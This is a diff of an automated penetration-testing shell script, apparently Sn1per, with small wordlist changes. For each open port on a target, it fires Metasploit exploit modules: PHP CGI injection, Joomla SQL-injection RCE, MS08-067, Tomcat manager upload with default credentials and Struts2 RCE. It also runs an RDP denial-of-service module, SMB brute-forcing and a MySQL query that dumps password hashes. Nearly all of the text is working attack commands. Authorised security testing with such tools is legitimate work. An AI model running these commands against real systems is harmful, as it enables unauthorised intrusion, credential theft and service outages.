echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -2033,7 +2464,14 @@ else
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/smb/smb_version; run; use auxiliary/scanner/smb/pipe_auditor; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use exploit/windows/smb/ms06_040_netapi; run; use exploit/windows/smb/ms05_039_pnp; run; use exploit/windows/smb/ms10_061_spoolss; run; use exploit/windows/smb/ms09_050_smb2_negotiate_func_index; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
fi
if [ -z "$port_512" ];
@ -2123,6 +2561,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
msfconsole -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;"
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@ -2148,6 +2587,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -Pn -T5 --script=rdp-* -p 3389 $TARGET
msfconsole -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; run; back; exit;"
rdesktop $TARGET &
fi
@ -2171,7 +2611,9 @@ else
echo ""
sslscan --no-failed $TARGET:4443
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
nikto -h https://$TARGET:4443 -output $LOOT_DIR/web/nikto-$TARGET-https-4443.txt
if [ "$NIKTO" = "1" ]; then
nikto -h https://$TARGET:4443 -output $LOOT_DIR/web/nikto-$TARGET-https-4443.txt
fi
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg --insecure --max-wait=1000 2> /dev/null
else
@ -2186,6 +2628,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV -Pn --script=pgsql-brute -p 5432 $TARGET
msfconsole -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;"
fi
if [ -z "$port_5800" ];
@ -2202,6 +2645,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;"
fi
if [ -z "$port_5984" ];
@ -2293,8 +2737,28 @@ else
else
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg --insecure --max-wait=1000 2> /dev/null
fi
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS CVE-2017-5638 VULN SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST PLUGIN XSTREAM RCE VULN CHECK $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "${OKBLUE}[*] If you see a 200 response code below, try running 'msfconsole -x \"multi/http/struts2_rest_xstream; set RHOST \"$TARGET\"; exploit -j; exit;"
curl -I http://$TARGET:8080/struts2-rest-showcase/orders/3 -s | grep HTTP | grep 200
curl -I http://$TARGET:8080/struts2-showcase/integration/saveGangster.action -s | grep HTTP | grep 200
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA RCE VULN CHECK $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "${OKBLUE}[*] If you see a 200 response code below, try running 'msfconsole -x \"multi/http/struts2_content_type_ognl; set RHOST \"$TARGET\"; exploit -j; exit;"
curl -I http://$TARGET:8080/struts2-showcase/ -s | grep HTTP | grep 200
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use admin/http/jboss_bshdeployer; run; use auxiliary/scanner/http/jboss_status; run; use admin/http/tomcat_administration; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WILDFLY TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/wildfly_traversal; setg RHOSTS "$TARGET"; set RPORT 8080; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -2402,6 +2866,7 @@ else
echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
amap $TARGET 16992 -A
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
msfconsole -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;"
fi
if [ -z "$port_27017" ];

View File

@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo ""
INSTALL_DIR=/usr/share/sniper

View File

@ -1,4 +1,5 @@
uddiexplorer
+CSCOE+/logon.html
_
__

File diff suppressed because it is too large Load Diff

View File

@ -1,3 +1,5 @@
uddiexplorer
a2e2gp2r2x.jsp
+CSCOE+/logon.html
.access

View File

@ -1,3 +1,5 @@
uddiexplorer
_
+CSCOE+/logon.html
@